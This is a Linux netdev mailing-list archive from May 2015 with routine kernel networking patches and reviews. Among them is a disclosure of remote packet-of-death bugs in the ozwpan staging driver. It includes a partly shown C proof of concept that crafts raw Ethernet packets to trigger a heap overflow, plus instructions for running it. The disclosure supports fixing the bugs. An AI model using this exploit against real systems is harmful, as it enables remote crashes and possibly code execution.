Re: [PATCH -next] net: sched: use counter to break reclassify loops

2015-05-13 Thread Florian Westphal
Jamal Hadi Salim j...@mojatatu.com wrote:
 On 05/12/15 09:00, Florian Westphal wrote:
 Jamal Hadi Salim j...@mojatatu.com wrote:
 Florian,
 In general i am in support of removing this - since the use case never
 materialized as being useful. However, this is not the same logic that
 was there before. To get equivalency you need to pass the limit into
 tc_classify_compat() so i can be reset.
 
 AFAICS this re-set only happens when we return something other
 than RECLASSIFY which means the caller will not check the limit.
 
 So in fact it should be ok to remove this since the counter will always
 start from 0 on next tc_classify() invocation.
 
 
 Florian, consider the following scenario:
 Assume X is the max allowed reclassified before bells start ringing.
 If we see upto X back-to-back reclassify - we are very much likely in
 a loop. We should see fire trucks arrive and bail out.
 If we see X-1  reclassify followed by a pipe followed by
 X-1 reclassify followed by ok then that looks like a healthy
 policy. But that is a a total of 2X-2 reclassifies. You will
 bail out at X reclassifies; what i am saying is you shouldnt.
 And existing logic doesnt. Does that make sense?

Yes, but, if we use your example above then:

tc_classify called
  limit 0
tc_classify_compat called, ret RECLASSIFY
  limit 1
tc_classify_compat called, ret RECLASSIFY
  limit 2
tc_classify_compat called, ret PIPE (== 3)
  tc_classify returns 3
tc_classify called
  limit 0
  ...

So we don't toss skb since any return value other than RECLASSIFY
will make tc_classify() return to its caller, and when caller invokes
tc_classify again the limit variable is set to 0 again.

Does that make sense to you?

Thanks Jamal.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: gone with the spring cleanup..

2015-05-13 Thread Daniel Borkmann

On 05/13/2015 12:55 PM, Or Gerlitz wrote:

On 5/13/2015 1:42 PM, Jiri Pirko wrote:

Looks like the problem might be in named structures which suppose to be
anonymous. Would you try following patch:

oh, switchdev_obj_vlan and switchdev_obj_ipv4_fib is used in rocker..
So better:


nope, fails.. if I remove the union (it is struct switchdev_obj has strict vlan 
and ipv4_fib fields) it works. Seems there's some problem also with anonymous 
unions.


Yes, we once had such an issue here btw:

https://git.kernel.org/cgit/linux/kernel/git/davem/net-next.git/commit/lib/test_bpf.c?id=ece80490e2c1cefda018b2e5b96d4f39083d9096
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


[PATCH iproute2] man ip-link: Remove extra GROUP explanation

2015-05-13 Thread Vadim Kochan
From: Vadim Kochan vadi...@gmail.com

Remove double explanation of GROUP option from 'ip link set' section.

Signed-off-by: Vadim Kochan vadi...@gmail.com
---
 man/man8/ip-link.8.in | 8 +---
 1 file changed, 1 insertion(+), 7 deletions(-)

diff --git a/man/man8/ip-link.8.in b/man/man8/ip-link.8.in
index 823246f..714aab4 100644
--- a/man/man8/ip-link.8.in
+++ b/man/man8/ip-link.8.in
@@ -714,12 +714,6 @@ tool can be used. But it allows to change network 
namespace only for physical de
 give the device a symbolic name for easy reference.
 
 .TP
-.BI group  GROUP
-specify the group the device belongs to.
-The available groups are listed in file
-.BR @SYSCONFDIR@/group .
-
-.TP
 .BI vf  NUM
 specify a Virtual Function device to be configured. The associated PF device
 must be specified using the
@@ -867,7 +861,7 @@ specifies which help of link type to dislpay.
 .SS
 .I GROUP
 may be a number or a string from the file
-.B /etc/iproute2/group
+.B @SYSCONFDIR@/group
 which can be manually filled.
 
 .SH EXAMPLES
-- 
2.3.1

--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH net-next] tcp/dccp: tw_timer_handler() is static

2015-05-13 Thread David Miller
From: Eric Dumazet eric.duma...@gmail.com
Date: Tue, 12 May 2015 06:22:56 -0700

 From: Eric Dumazet eduma...@google.com
 
 tw_timer_handler() is only used from net/ipv4/inet_timewait_sock.c
 
 Fixes: 789f558cfb36 (tcp/dccp: get rid of central timewait timer)
 Signed-off-by: Eric Dumazet eduma...@google.com

Applied.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH net-next] ipv4: __ip_local_out_sk() is static

2015-05-13 Thread David Miller
From: Eric Dumazet eric.duma...@gmail.com
Date: Tue, 12 May 2015 06:31:48 -0700

 From: Eric Dumazet eduma...@google.com
 
 __ip_local_out_sk() is only used from net/ipv4/ip_output.c
 
 net/ipv4/ip_output.c:94:5: warning: symbol '__ip_local_out_sk' was not
 declared. Should it be static?
 
 Fixes: 7026b1ddb6b8 (netfilter: Pass socket pointer down through okfn().)
 Signed-off-by: Eric Dumazet eduma...@google.com

Applied.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH v3 net-next 1/5] net: Get skb hash over flow_keys structure

2015-05-13 Thread David Miller
From: Tom Herbert t...@herbertland.com
Date: Tue, 12 May 2015 08:22:58 -0700

 @@ -15,6 +15,13 @@
   * All the members, except thoff, are in network byte order.
   */
  struct flow_keys {
 + u16 thoff;
 + u16 padding1;
 +#define FLOW_KEYS_HASH_START_FIELD   n_proto
 + __be16  n_proto;
 + u8  ip_proto;
 + u8  padding;
 +

This padding works if everyone consistently zero initializes the whole
key structure, but for whatever reason (performance, unintentional
oversight, etc.) not all paths do.

So, for example, inet_set_txhash() is going to have random crap in
keys.padding, so the hashes computed are not stable for a given flow
key tuple.

That's just the first code path I found with this issue, there are
probably several others.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


[PATCH 1/4] ozwpan: Use proper check to prevent heap overflow

2015-05-13 Thread Jason A. Donenfeld
Since elt-length is a u8, we can make this variable a u8. Then we can
do proper bounds checking more easily. Without this, a potentially
negative value is passed to the memcpy inside oz_hcd_get_desc_cnf,
resulting in a remotely exploitable heap overflow with network
supplied data.

This could result in remote code execution. A PoC which obtains DoS
follows below. It requires the ozprotocol.h file from this module.

=-=-=-=-=-=

 #include arpa/inet.h
 #include linux/if_packet.h
 #include net/if.h
 #include netinet/ether.h
 #include stdio.h
 #include string.h
 #include stdlib.h
 #include endian.h
 #include sys/ioctl.h
 #include sys/socket.h

 #define u8 uint8_t
 #define u16 uint16_t
 #define u32 uint32_t
 #define __packed __attribute__((__packed__))
 #include ozprotocol.h

static int hex2num(char c)
{
if (c = '0'  c = '9')
return c - '0';
if (c = 'a'  c = 'f')
return c - 'a' + 10;
if (c = 'A'  c = 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i  6; i++) {
int a, b;
a = hex2num(*txt++);
if (a  0)
return -1;
b = hex2num(*txt++);
if (b  0)
return -1;
*addr++ = (a  4) | b;
if (i  5  *txt++ != ':')
return -1;
}
return 0;
}

int main(int argc, char *argv[])
{
if (argc  3) {
fprintf(stderr, Usage: %s interface destination_mac\n, 
argv[0]);
return 1;
}

uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, Invalid mac address.\n);
return 1;
}

int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd  0) {
perror(socket);
return 1;
}

struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, if_idx)  0) {
perror(SIOCGIFINDEX);
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, if_idx)  0) {
perror(SIOCGIFHWADDR);
return 1;
}
uint8_t *src_mac = (uint8_t *)if_idx.ifr_hwaddr.sa_data;

struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
} __packed connect_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], 
src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], 
dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION  
OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 35,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1  OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
}
};

struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_get_desc_rsp oz_get_desc_rsp;
} __packed pwn_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], 
src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], 
dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION  
OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(1)
},
.oz_elt = {
.type = 

Re: [oss-security] [PATCH 0/4] ozwpan: Four remote packet-of-death vulnerabilities

2015-05-13 Thread Greg KH
On Wed, May 13, 2015 at 08:33:30PM +0200, Jason A. Donenfeld wrote:
 The ozwpan driver accepts network packets, parses them, and converts
 them into various USB functionality. There are numerous security
 vulnerabilities in the handling of these packets. Two of them result in
 a memcpy(kernel_buffer, network_packet, -length), one of them is a
 divide-by-zero, and one of them is a loop that decrements -1 until it's
 zero.
 
 I've written a very simple proof-of-concept for each one of these
 vulnerabilities to aid with detecting and fixing them. The general
 operation of each proof-of-concept code is:
 
   - Load the module with:
 # insmod ozwpan.ko g_net_dev=eth0
   - Compile the PoC with ozprotocol.h from the kernel tree:
 $ cp /path/to/linux/drivers/staging/ozwpan/ozprotocol.h ./
 $ gcc ./poc.c -o ./poc
   - Run the PoC:
 # ./poc eth0 [mac-address]
 
 These PoCs should also be useful to the maintainers for testing out
 constructing and sending various other types of malformed packets against
 which this driver should be hardened.
 
 Please assign CVEs for these vulnerabilities. I believe the first two
 patches of this set can receive one CVE for both, and the remaining two
 can receive one CVE each.
 
 
 On a slightly related note, there are several other vulnerabilities in
 this driver that are worth looking into. When ozwpan receives a packet,
 it casts the packet into a variety of different structs, based on the
 value of type and length parameters inside the packet. When making these
 casts, and when reading bytes based on this length parameter, the actual
 length of the packet in the socket buffer is never actually consulted. As
 such, it's very likely that a packet could be sent that results in the
 kernel reading memory in adjacent buffers, resulting in an information
 leak, or from unpaged addresses, resulting in a crash. In the former case,
 it may be possible with certain message types to actually send these
 leaked adjacent bytes back to the sender of the packet. So, I'd highly
 recommend the maintainers of this driver go branch-by-branch from the
 initial rx function, adding checks to ensure all reads and casts are
 within the bounds of the socket buffer.
 
 Jason A. Donenfeld (4):
   ozwpan: Use proper check to prevent heap overflow
   ozwpan: Use unsigned ints to prevent heap overflow
   ozwpan: divide-by-zero leading to panic
   ozwpan: unchecked signed subtraction leads to DoS
 
  drivers/staging/ozwpan/ozhcd.c |  8 
  drivers/staging/ozwpan/ozusbif.h   |  4 ++--
  drivers/staging/ozwpan/ozusbsvc1.c | 11 +--
  3 files changed, 15 insertions(+), 8 deletions(-)

Any reason you didn't cc: the maintainer who could actually apply these
to the kernel tree?

Please use scripts/get_maintainer.pl to properly notify the correct
people.

thanks,

greg k-h
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [patch -next] net: macb: OR vs AND typos

2015-05-13 Thread David Miller
From: Dan Carpenter dan.carpen...@oracle.com
Date: Tue, 12 May 2015 21:15:24 +0300

 The bitwise tests are always true here because it uses '|' where '' is
 intended.
 
 Fixes: 98b5a0f4a228 ('net: macb: Add support for jumbo frames')
 Signed-off-by: Dan Carpenter dan.carpen...@oracle.com

Applied, thanks.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH -next] net: sched: use counter to break reclassify loops

2015-05-13 Thread David Miller
From: Florian Westphal f...@strlen.de
Date: Mon, 11 May 2015 19:50:41 +0200

 Seems all we want here is to avoid endless 'goto reclassify' loop.
 tc_classify_compat even resets this counter when something other
 than TC_ACT_RECLASSIFY is returned, so this skb-counter doesn't
 break hypothetical loops induced by something other than perpetual
 TC_ACT_RECLASSIFY return values.
 
 skb_act_clone is now identical to skb_clone, so just use that.
 
 Tested with following (bogus) filter:
 tc filter add dev eth0 parent : \
  protocol ip u32 match u32 0 0 police rate 10Kbit burst \
  64000 mtu 1500 action reclassify
 
 Acked-by: Daniel Borkmann dan...@iogearbox.net
 Signed-off-by: Florian Westphal f...@strlen.de

Applied, thanks everyone.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH net-next,1/1] hv_netvsc: use per_cpu stats to calculate TX/RX data

2015-05-13 Thread David Miller
From: six...@microsoft.com
Date: Tue, 12 May 2015 15:50:02 -0700

 From: Simon Xiao six...@microsoft.com
 
 Current code does not lock anything when calculating the TX and RX stats.
 As a result, the RX and TX data reported by ifconfig are not accuracy in a
 system with high network throughput and multiple CPUs (in my test,
 RX/TX = 83% between 2 HyperV VM nodes which have 8 vCPUs and 40G Ethernet).
 
 This patch fixed the above issue by using per_cpu stats.
 netvsc_get_stats64() summarizes TX and RX data by iterating over all CPUs
 to get their respective stats.
 
 Signed-off-by: Simon Xiao six...@microsoft.com
 Reviewed-by: K. Y. Srinivasan k...@microsoft.com
 Reviewed-by: Haiyang Zhang haiya...@microsoft.com
 ---
  drivers/net/hyperv/hyperv_net.h |  9 +
  drivers/net/hyperv/netvsc_drv.c | 80 
 -
  2 files changed, 81 insertions(+), 8 deletions(-)
 
 diff --git a/drivers/net/hyperv/hyperv_net.h b/drivers/net/hyperv/hyperv_net.h
 index 41071d3..5a92b36 100644
 --- a/drivers/net/hyperv/hyperv_net.h
 +++ b/drivers/net/hyperv/hyperv_net.h
 @@ -611,6 +611,12 @@ struct multi_send_data {
   u32 count; /* counter of batched packets */
  };
  
 +struct netvsc_stats {
 + u64 packets;
 + u64 bytes;
 + struct u64_stats_sync s_sync;
 +};
 +
  /* The context of the netvsc device  */
  struct net_device_context {
   /* point back to our device context */
 @@ -618,6 +624,9 @@ struct net_device_context {
   struct delayed_work dwork;
   struct work_struct work;
   u32 msg_enable; /* debug level */
 +
 + struct netvsc_stats __percpu *tx_stats;
 + struct netvsc_stats __percpu *rx_stats;
  };
  
  /* Per netvsc device */
 diff --git a/drivers/net/hyperv/netvsc_drv.c b/drivers/net/hyperv/netvsc_drv.c
 index 5993c7e..310b902 100644
 --- a/drivers/net/hyperv/netvsc_drv.c
 +++ b/drivers/net/hyperv/netvsc_drv.c
 @@ -391,7 +391,7 @@ static int netvsc_start_xmit(struct sk_buff *skb, struct 
 net_device *net)
   u32 skb_length;
   u32 pkt_sz;
   struct hv_page_buffer page_buf[MAX_PAGE_BUFFER_COUNT];
 -
 + struct netvsc_stats *tx_stats = this_cpu_ptr(net_device_ctx-tx_stats);
  
   /* We will atmost need two pages to describe the rndis
* header. We can only transmit MAX_PAGE_BUFFER_COUNT number
 @@ -580,8 +580,10 @@ do_send:
  
  drop:
   if (ret == 0) {
 - net-stats.tx_bytes += skb_length;
 - net-stats.tx_packets++;
 + u64_stats_update_begin(tx_stats-s_sync);
 + tx_stats-packets++;
 + tx_stats-bytes += skb_length;
 + u64_stats_update_end(tx_stats-s_sync);
   } else {
   if (ret != -EAGAIN) {
   dev_kfree_skb_any(skb);
 @@ -644,13 +646,17 @@ int netvsc_recv_callback(struct hv_device *device_obj,
   struct ndis_tcp_ip_checksum_info *csum_info)
  {
   struct net_device *net;
 + struct net_device_context *net_device_ctx;
   struct sk_buff *skb;
 + struct netvsc_stats *rx_stats;
  
   net = ((struct netvsc_device *)hv_get_drvdata(device_obj))-ndev;
   if (!net || net-reg_state != NETREG_REGISTERED) {
   packet-status = NVSP_STAT_FAIL;
   return 0;
   }
 + net_device_ctx = netdev_priv(net);
 + rx_stats = this_cpu_ptr(net_device_ctx-rx_stats);
  
   /* Allocate a skb - TODO direct I/O to pages? */
   skb = netdev_alloc_skb_ip_align(net, packet-total_data_buflen);
 @@ -686,8 +692,10 @@ int netvsc_recv_callback(struct hv_device *device_obj,
   skb_record_rx_queue(skb, packet-channel-
   offermsg.offer.sub_channel_index);
  
 - net-stats.rx_packets++;
 - net-stats.rx_bytes += packet-total_data_buflen;
 + u64_stats_update_begin(rx_stats-s_sync);
 + rx_stats-packets++;
 + rx_stats-bytes += packet-total_data_buflen;
 + u64_stats_update_end(rx_stats-s_sync);
  
   /*
* Pass the skb back up. Network stack will deallocate the skb when it
 @@ -753,6 +761,46 @@ static int netvsc_change_mtu(struct net_device *ndev, 
 int mtu)
   return 0;
  }
  
 +static struct rtnl_link_stats64 *netvsc_get_stats64(struct net_device *net,
 + struct rtnl_link_stats64 *t)
 +{
 + struct net_device_context *ndev_ctx = netdev_priv(net);
 + int cpu;
 +
 + for_each_possible_cpu(cpu) {
 + struct netvsc_stats *tx_stats = per_cpu_ptr(ndev_ctx-tx_stats,
 + cpu);
 + struct netvsc_stats *rx_stats = per_cpu_ptr(ndev_ctx-rx_stats,
 + cpu);
 + u64 tx_packets, tx_bytes, rx_packets, rx_bytes;
 + unsigned int start;
 +
 + do {
 + start = u64_stats_fetch_begin_irq(tx_stats-s_sync);
 + tx_packets = tx_stats-packets;
 + 

Re: [PATCH] vlan: Correctly propagate promisc|allmulti flags in notifier.

2015-05-13 Thread David Miller
From: Vladislav Yasevich vyasev...@gmail.com
Date: Tue, 12 May 2015 20:53:14 -0400

 Currently vlan notifier handler will try to update all vlans
 for a device when that device comes up.  A problem occurs,
 however, when the vlan device was set to promiscuous, but not
 by the user (ex: a bridge).  In that case, dev-gflags are
 not updated.  What results is that the lower device ends
 up with an extra promiscuity count.  Here are the
 backtraces that prove this:
 ...
 The above comes from the setting the vlan device to IFF_UP state.
 ...
 And this one comes from the notification code.  What we end
 up with is a vlan with promiscuity count of 1 and and a physical
 device with a promiscuity count of 2.  They should both have
 a count 1.
 
 To resolve this issue, vlan code can use dev_get_flags() api
 which correctly masks promiscuity and allmulti flags.

Applied, thanks Vlad.

 Sign-off-by: Vlad Yasevich vyase...@redhat.com

Note, it's Signed-off-by: not Sign-off-by: I fixed this for
you.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH 0/5 net-next] Netfilter ingress support (v4)

2015-05-13 Thread David Miller
From: Pablo Neira Ayuso pa...@netfilter.org
Date: Wed, 13 May 2015 18:19:33 +0200

 This is the v4 round of patches to add the Netfilter ingress hook, it 
 basically
 comes in two steps:
 ...
 Please, apply. Thanks.

Series applied, thanks Pablo.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH 5/5] netfilter: add netfilter ingress hook after handle_ing() under unique static key

2015-05-13 Thread David Miller
From: Nicolas Dichtel nicolas.dich...@6wind.com
Date: Wed, 13 May 2015 21:36:25 +0200

 Le 13/05/2015 18:19, Pablo Neira Ayuso a écrit :
 [snip]
 --- /dev/null
 +++ b/include/linux/netfilter_ingress.h
 [snip]
 +static inline void nf_hook_ingress_init(struct net_device *dev)
 +{
 +INIT_LIST_HEAD(dev-nf_hooks_ingress);
 nit: this line is indented with spaces instead of a tab.

I took care of this when I applied Pablo's series.

Thanks.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH net-next v2 0/2] sfc: Bowdlerise PTP MCDI errors

2015-05-13 Thread David Miller
From: Edward Cree ec...@solarflare.com
Date: Tue, 12 May 2015 13:03:27 +0100

 When the NIC doesn't support PTP, probe-time MCDI commands fail in
 predictable ways.  Instead of logging cryptic MCDI errors, just log that
 PTP isn't supported.
 
 v2: Hopefully stop Thunderbird mangling the patches.

Series applied, thanks.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH net-next] net: kill useless net_*_ingress_queue() definitions when NET_CLS_ACT is unset

2015-05-13 Thread David Miller
From: Pablo Neira Ayuso pa...@netfilter.org
Date: Tue, 12 May 2015 20:28:07 +0200

 This fixes 4577139b2dabf589 (net: use jump label patching for ingress qdisc 
 in
 __netif_receive_skb_core).
 
 The only client of this is sch_ingress and it depends on NET_CLS_ACT. So
 there is no way these definition can be of any help.
 
 Cc: Daniel Borkmann dan...@iogearbox.net
 Signed-off-by: Pablo Neira Ayuso pa...@netfilter.org

Applied, thanks Pablo.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH v3] add GENEVE netdev tunnel driver

2015-05-13 Thread David Miller
From: John W. Linville linvi...@tuxdriver.com
Date: Wed, 13 May 2015 12:57:25 -0400

 This 5-patch kernel series adds a netdev implementation of a GENEVE
 tunnel driver, and the single iproute2 patch enables creation and
 such for those netdevs.  This makes use of the existing GENEVE
 infrastructure already used by the OVS code.  The net/ipv4/geneve.c
 file is renamed as net/ipv4/geneve_core.c as part of these changes.
 ...
 The overall structure of the GENEVE netdev driver is strongly
 influenced by the VXLAN netdev driver.  This is not surprising, as the
 two drivers are intended to serve similar purposes.  As development of
 the GENEVE driver continues, it is likely that those similarities will
 grow stronger.  This will include both simple configuration options
 (e.g. TOS and TTL settings) and new control plane support.
 
 The current implementation is very simple, restricting itself to point
 to point links over IPv4.  This is due only to the simplicity of the
 implementation, and no such limit is inherent to GENEVE in any way.
 Support for IPv6 links and more sophisticated control plane options
 are predictable enhancements.
 
 Using the included iproute2 patch, a GENEVE tunnel is created thusly:
 
 ip link add dev gnv0 type geneve remote 192.168.22.1 vni 1234
 ip link set gnv0 up
 ip addr add 10.1.1.1/24 dev gnv0
 
 After a corresponding tunnel interface is created at the link partner,
 traffic should proceed as expected.
 
 Please let me know if anyone has problems...thanks!

Looks good, series applied, thanks John!
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH net 1/2] ipv6: do not delete previously existing ECMP routes if add fails

2015-05-13 Thread Michal Kubecek
On Wed, May 13, 2015 at 06:30:20AM -0700, roopa wrote:
 
 This looks like a similar bug i was trying to fix some time back:
 http://patchwork.ozlabs.org/patch/362296/
 
 (I am not sure if my full patch is still valid. I was thinking of
 re-spining it sometime soon. If you are interested in trying it out,
 please do)

It's essentially the same idea but I prefer to use variable remaining
which is already there and is needed anyway rather than introduce
three extra variables for the cleanup (which is quite similar to the
suggestion from Hannes' reply).

I've sent v2 few minutes ago.

   Michal Kubecek

--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [patch net-next v3 00/15] introduce programable flow dissector and cls_flower

2015-05-13 Thread David Miller
From: Jiri Pirko j...@resnulli.us
Date: Tue, 12 May 2015 14:56:06 +0200

 Per Davem's request, I prepared this patchset which introduces programmable
 flow dissector. For current users of flow_keys, there is a wrapper
 skb_flow_dissect_flow_keys which maintains the previous behaviour.
 For purposes of cls_flower, couple of new dissection keys were introduced.
 
 Note that this dissector can be also eventually used by openvswitch code.
 
 Also, as a next step, I plan to get rid of *skb_flow_get_ports(export)
 and *__skb_get_poff as their functionality can be now implemented by
 skb_flow_dissect as well.
 
 v2-v3:
 - remove TCA_FLOWER_POLICE attr suggested by Jamal
 
 v1-v2:
 - move __skb_tx_hash rather to dev.c as suggested by Alex

Ok, assuming this passes all of my build tests, I'll push this into
net-next.

I'm sure there will be some performance improvements possible, and I
hope you will look into making sure this new programmable classifier
is as light weight as possible.

Anyways, thanks a lot.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [PATCH net-next v3 0/6] refine rollover

2015-05-13 Thread David Miller
From: Willem de Bruijn will...@google.com
Date: Tue, 12 May 2015 11:56:44 -0400

 From: Willem de Bruijn will...@google.com
 
 refine packet socket rollover:
 
 1. mitigate a case of lock contention
 2. avoid exporting resource exhaustion to other sockets,
by migrating only to a victim socket that has ample room
 3. avoid reordering of most flows on the socket,
by migrating first the flow responsible for load imbalance
 4. help processes detect load imbalance,
by exporting rollover counters
 
 Context: rollover implements flow migration in packet socket fanout
 groups in case of extreme load imbalance. It is a specific
 implementation of migration that minimizes reordering by selecting
 the same victim socket when possible (and by selecting subsequent
 victims in a round robin fashion, from which its name derives).

The user API looks a lot better now, series applied, thanks Willem.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [net-next PATCH] net: Reserve skb headroom and set skb-dev even if using __alloc_skb

2015-05-13 Thread David Miller
From: Alexander Duyck alexander.h.du...@redhat.com
Date: Wed, 13 May 2015 13:34:13 -0700

 When I had inlined __alloc_rx_skb into __netdev_alloc_skb and
 __napi_alloc_skb I had overlooked the fact that there was a return in the
 __alloc_rx_skb.  As a result we weren't reserving headroom or setting the
 skb-dev in certain cases.  This change corrects that by adding a couple of
 jump labels to jump to depending on __alloc_skb either succeeding or failing.
 
 Fixes: 9451980a6646 (net: Use cached copy of pfmemalloc to avoid accessing 
 page)
 Reported-by: Felipe Balbi ba...@ti.com
 Signed-off-by: Alexander Duyck alexander.h.du...@redhat.com

Applied, thanks.
--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


[RFC PATCH 0/4] Make iSCSI network namespace aware

2015-05-13 Thread Chris Leech
I've had a few reports of people trying to run iscsid in a container, which
doesn't work at all when using network namespaces.  This is the start of me
looking at what it would take to make that work, and if it makes sense at all.

The first issue is that the kernel side of the iSCSI netlink control protocol
only operates in the initial network namespace.  But beyond that, if we allow
iSCSI to be managed within a namespace we need to decide what that means.  I
think it makes the most sense to isolate the iSCSI host, along with it's
associated endpoints, connections, and sessions, to a network namespace and
allow multiple instances of the userspace tools to exist in separate namespaces
managing separate hosts.

It works well for iscsi_tcp, which creates a host per session.  There's no
attempt to manage sessions on offloading hosts independently, although future
work could include the ability to move an entire host to a new namespace like
is supported for network devices.

This is only about the structures and functionality involved in maintaining the
iSCSI session, the SCSI host along with it's discovered targets and devices has
no association with network namespaces.

These patches are functional, but not complete.  There's no isolation enforced
in the kernel just yet, so it relies on well behaved userspace.  I plan on
fixing that, but wanted some feedback on the idea and approach so far.

Thanks,
Chris

Chris Leech (4):
  iscsi: create per-net iscsi nl kernel sockets
  iscsi: sysfs filtering by network namespace
  iscsi: make all netlink multicast namespace aware
  iscsi: set netns for iscsi_tcp hosts

 drivers/scsi/iscsi_tcp.c|   7 +
 drivers/scsi/scsi_transport_iscsi.c | 264 +---
 include/scsi/scsi_transport_iscsi.h |   2 +
 3 files changed, 222 insertions(+), 51 deletions(-)

-- 
2.1.0

--
To unsubscribe from this list: send the line unsubscribe netdev in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


[RFC PATCH 4/4] iscsi: set netns for iscsi_tcp hosts

2015-05-13 Thread Chris Leech
This lets iscsi_tcp operate in multiple namespaces.  It uses current
during session creation to find the net namespace, but it might be
better to manage to pass it along from the iscsi netlink socket.
---
 drivers/scsi/iscsi_tcp.c| 7 +++
 drivers/scsi/scsi_transport_iscsi.c | 7 ++-
 include/scsi/scsi_transport_iscsi.h | 1 +
 3 files changed, 14 insertions(+), 1 deletion(-)

diff --git a/drivers/scsi/iscsi_tcp.c b/drivers/scsi/iscsi_tcp.c
index 0b8af18..ebe99da 100644
--- a/drivers/scsi/iscsi_tcp.c
+++ b/drivers/scsi/iscsi_tcp.c
@@ -948,6 +948,11 @@ static int iscsi_sw_tcp_slave_configure(struct scsi_device 
*sdev)
return 0;
 }
 
+static struct net *iscsi_sw_tcp_netns(struct Scsi_Host *shost)
+{
+   return current-nsproxy-net_ns;
+}
+
 static struct scsi_host_template iscsi_sw_tcp_sht = {
.module = THIS_MODULE,
.name   = iSCSI Initiator over TCP/IP,
@@ -1003,6 +1008,8 @@ static struct iscsi_transport iscsi_sw_tcp_transport = {
.alloc_pdu  = iscsi_sw_tcp_pdu_alloc,
/* recovery */
.session_recovery_timedout = iscsi_session_recovery_timedout,
+   /* net namespace */
+   .get_netns  = iscsi_sw_tcp_netns,
 };
 
 static int __init iscsi_sw_tcp_init(void)
diff --git a/drivers/scsi/scsi_transport_iscsi.c 
b/drivers/scsi/scsi_transport_iscsi.c
index 4fdd4bf..791aacd 100644
